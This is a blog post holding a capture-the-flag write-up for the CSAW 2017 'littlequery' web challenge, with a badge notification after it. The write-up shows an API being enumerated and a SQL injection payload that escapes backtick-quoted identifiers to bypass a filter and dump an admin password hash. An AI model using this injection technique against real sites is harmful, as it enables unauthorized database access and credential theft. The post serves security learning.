CSAW CTF Qualification Round 2017 -- littlequery -- Web200 Writeup

in #csaw7 years ago (edited)

CSAW CTF Qualification Round 2017 -- littlequery -- Web200 Writeup

problem description

LittleQuery
I've got a new website for BIG DATA analytics!
http://littlequery.chal.csaw.io<


on first page source code there is html comment for some api

/api/db_explore.php">API</a></p> kquote>


check it

Must specify mode={schema|preview}

lets try schema

http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema

{"dbs":["littlequery"]}


this feature enable us to see db structure

http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery&table=user

{"columns":{"uid":"int(11)","username":"varchar(128)","password":"varchar(40)"}}

if we try to see content using preview we are blocked

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery&table=user

Database 'littlequery' is not allowed to be previewed.

but this looks like dummy filter

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequeryTEST&table=user

`littlequeryTEST`.`user` doesn't exist.

so db query somehow like this

select * from `$db`.`$table`


since littlequery in db var is blocked we can do sqlinj

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`--%20-&table=

[{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}]

and there u got hash

use it to login passed hash directory in post and get flag

flag{mayb3_1ts_t1m3_4_real_real_escape_string?}


Sort:  

Congratulations @maniffin! You have completed some achievement on Steemit and have been rewarded with new badge(s) :

You published your First Post
You got a First Vote
You made your First Vote

Click on any badge to view your own Board of Honor on SteemitBoard.
For more information about SteemitBoard, click here

If you no longer want to receive notifications, reply to this comment with the word STOP

By upvoting this notification, you can help all Steemit users. Learn how here!